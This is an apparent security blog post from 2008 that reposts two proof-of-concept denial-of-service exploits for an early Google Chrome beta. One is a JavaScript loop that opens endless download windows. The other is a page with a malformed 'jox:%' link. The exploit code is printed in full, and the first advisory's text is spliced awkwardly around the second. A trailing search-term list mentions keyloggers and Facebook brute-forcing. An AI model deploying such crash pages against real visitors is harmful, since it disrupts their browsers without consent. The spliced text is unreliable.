Google Chrome Browser Crash Script – proof of concept

Another advisories on Google Chrome’s vulnerability have been released within few days ago , it seems like there are a lot of security researchers out there trying to find any security flaw on this, brand new Google Chrome Browser ! This post is still related to my Google Chrome 0day article anyway. Well , I just took my daily rss-reading on Packetstormsecurity , and found 2 Advisories on Google Chrome Browser released almost in the same time!

Anyway , here they are :

Google Chrome Crash Script
IMC GrahamPhisher.com

Shoutz
IMC Security Team
IMC Tully
IMC EXE
Shouts To Everyone On The Forums
InsaneMasterminds.com

Google’s new web browser Google Chrome will download files without
the user permission. So I came up with a script that will download
a file over and over again causing Google Chrome Beta to crash.

First start off by making a document called crash.html, Than add the
following script to the document.

<SCRIPT LANGUAGE=”JavaScript”>
document.write
{
var iCounter = 0
while (true)
{
window.open(“owned.zip”,”Grahamizgod” + iCounter,”width=1,height=1,resizable=no”)
iCounter++
}
}
</script>

Than save the file, create a zip file called owned and just putta
buncha stuff in it. Than upload the page and than when someone
vists that page, Google chrome will give the error, “Google Chrome,

original source : http://packetstormsecurity.org/0809-exploits/google-chrome-dos1.txt

And the second one :

<!———————————————–
| |
| Vulnerability discovered by Rishi Narang |
| |
| Exploit by LiquidWorm, September 2008 |
| |
| http://www.zeroscience.org |
| |
| liquidworm [t00t] gmail.com |
| |
————————————————>

<html>

<title>Google Chrome DoS Exploit</title>

<head>

<br />
<br />

<script type=”text/javascript”>

alert(“Google Chrome Browser 0.2.149.27 Denial of Service Exploit”);

var box = confirm(“Press OK to start exploitationnPress Cancel to skip exploitation”);

if (box == true)
{
document.write(“Just point to the hyperlink… <a href=”jox:%”><strong>HERE</strong></a>”);
}

else { alert(“Ok Dude!”); window.location.href = “http://www.zeroscience.org”; }

</script>

</head>

</html>
Woah! Google Chrome has crashed. Restart now?”
original source : http://packetstormsecurity.org/0809-exploits/google-chrome-dos2.txt

If you found any other security flaws on google chrome , plz let me know bout it :)

Recenly search

Incoming search terms for the article:

--stand-no-sand chrome browser crashgoogle chrome has crashedweb broser chrome crashesthe shocking real meaning of google logonew chrome beta crashesnet chrome strips scriptIMC Securitydocument location href chrome crashchrome crashes when following a hyperlinkchrome crash user scriptwoah google chrome have been restarted,  
Popular Today naruto shippuden 170 videologcat physics walkthroughnaruto shippuden 168 videologfacebook spybacktrack 3shy enginevtunnelBackTrack tutorialbacktrack 3 tutorialfacebook photo viewerSee The Shocking Hidden Message In The Google Logo that GOOGLE Does NOT Want You To Know About!how to view private myspace picturesmy empire hackview private myspace picturesSHOCKING: RUDE HIDDEN MESSAGE in Toy Story 3!facebook keyloggerHIDDEN MESSAGE IN GOOGLE LOGOTerri Moulton Hormanrapidleechbrute force facebook,   Computer Security Stuff on eBay!
Electronics stuffs on ebay

5 Responses to “Google Chrome Browser Crash Script – proof of concept”

  1. [...] interesting topic nowadays. This is the 4th post about Google chrome on this blog after this and that. I haven’t been aware of the new Google Chrome ’s Term of Service at all after I read [...]

  2. there are so many advantages and features with Chrome, such as it’s speed, for example; now if only they would take care it’s quirky cookie management…

  3. [...] Google Chrome Browser Crash Script – proof of concept [...]

  4. You can also use this JavaScript library to detect any browser including chrome. Not only this, you can trim a string, detect mouse positions etc

    http://rochakchauhan.com/blog/2008/10/11/rochakjs-javascript-class-of-common-functions/

  5. hah… it’s simple but very dangerous :P

Leave a Reply